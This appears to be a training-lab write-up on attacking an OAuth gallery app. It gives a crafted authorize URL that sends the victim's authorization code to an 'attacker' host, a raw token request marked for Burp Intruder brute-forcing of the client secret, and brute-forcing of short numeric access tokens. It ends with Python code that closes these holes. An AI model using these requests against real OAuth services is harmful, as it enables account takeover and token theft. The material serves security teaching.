Attacking OAuth
Task 1. Create a code stealing PoC. Craft a URL that can be sent to a victim in order to steal the authorization code once they log in at the /oauth endpoint. You can use the following data: the response type is "code", the scope is "view_gallery" and the client_id is "photoprint".
Task 2. Use the acquired code to bruteforce the client secret. Use a POST request to the /token endpoint in order to bruteforce the client secret. Consult the OAuth documentation to recreate the request. The grant type is "authorization_code".
Task 3. Discover another token vulnerability. Discover another vulnerability by abusing the /photos/me?access_token= endpoint.
Task 1
The vulnerability is an unvalidated redirect: the authorization server does not check the redirect_uri parameter against the URI registered for the client. Using the URL below, if a user is sent this link and then logs in, the authorization code is delivered to the attacker's host.
http://gallery:3005/oauth/authorize?response_type=code&redirect_uri=http%3A%2F%2Fattacker%2Fcallback&scope=view_gallery&client_id=photoprint

Task 2
After receiving the request, send it to Burp Intruder to bruteforce the secret (the §guess§ markers below are the Intruder payload position).
POST /token HTTP/1.1
Host: gallery:3005
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
redirect_uri=http%3A%2F%2Fgallery%3A3005%2Fcallback&grant_type=authorization_code&client_id=photoprint&client_secret=§guess§&code=44438

Update the request with the recovered client secret to obtain an access token.

Now use the access token against the /photos/me endpoint.
GET /photos/me?access_token=35580 HTTP/1.1
Host: gallery:3005
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Task 3
Alternatively, a valid access token itself can be bruteforced against the /photos/me?access_token= endpoint, since the tokens are short numeric values (compare access_token=35580 above).
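For contrast with the three weaknesses above (unvalidated redirect_uri in Task 1, a guessable client secret in Task 2, guessable codes and tokens in Task 3), here is an added example of how an authorization server closes them; it is not the lab's code, and the client registry, the placeholder secret and the handle_authorize simulation are assumptions for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed client registry for this example (not the lab's real store).
# The secret is a placeholder; a real one would come from secrets.token_urlsafe().
REGISTERED_CLIENTS = {
    "photoprint": {
        "redirect_uris": {"http://gallery:3005/callback"},
        "client_secret": "PLACEHOLDER-client-secret",
    },
}


def redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    """Exact-string match against the registered URIs: no prefix, host-only or
    pattern matching. This is the check whose absence lets the Task 1 URL send
    the authorization code to http://attacker/callback."""
    client = REGISTERED_CLIENTS.get(client_id)
    if client is None:
        return False
    if urlsplit(redirect_uri).fragment:  # RFC 6749 s3.1.2: no fragment component
        return False
    return redirect_uri in client["redirect_uris"]


def issue_code_or_token() -> str:
    """256-bit random value. The lab's 5-digit numeric codes and tokens (44438,
    35580) sit in a space of only 100,000 values, which is what makes the
    Task 3 brute force feasible."""
    return secrets.token_urlsafe(32)


def client_secret_matches(client_id: str, presented: str) -> bool:
    """Constant-time comparison, so response timing cannot narrow a guess.
    The secret itself also needs real entropy, or the Task 2 brute force works."""
    client = REGISTERED_CLIENTS.get(client_id)
    if client is None:
        return False
    return hmac.compare_digest(client["client_secret"].encode(), presented.encode())


def handle_authorize(params: dict) -> dict:
    """Simulated /oauth/authorize decision. An unregistered redirect_uri is an
    error shown to the user agent, never a redirect (RFC 6749 s4.1.2.1)."""
    if params.get("response_type") != "code":
        return {"error": "unsupported_response_type"}
    client_id = params.get("client_id", "")
    redirect_uri = params.get("redirect_uri", "")
    if not redirect_uri_allowed(client_id, redirect_uri):
        return {"error": "invalid_request",
                "error_description": "redirect_uri not registered for client"}
    return {"redirect_to": redirect_uri, "code": issue_code_or_token()}
```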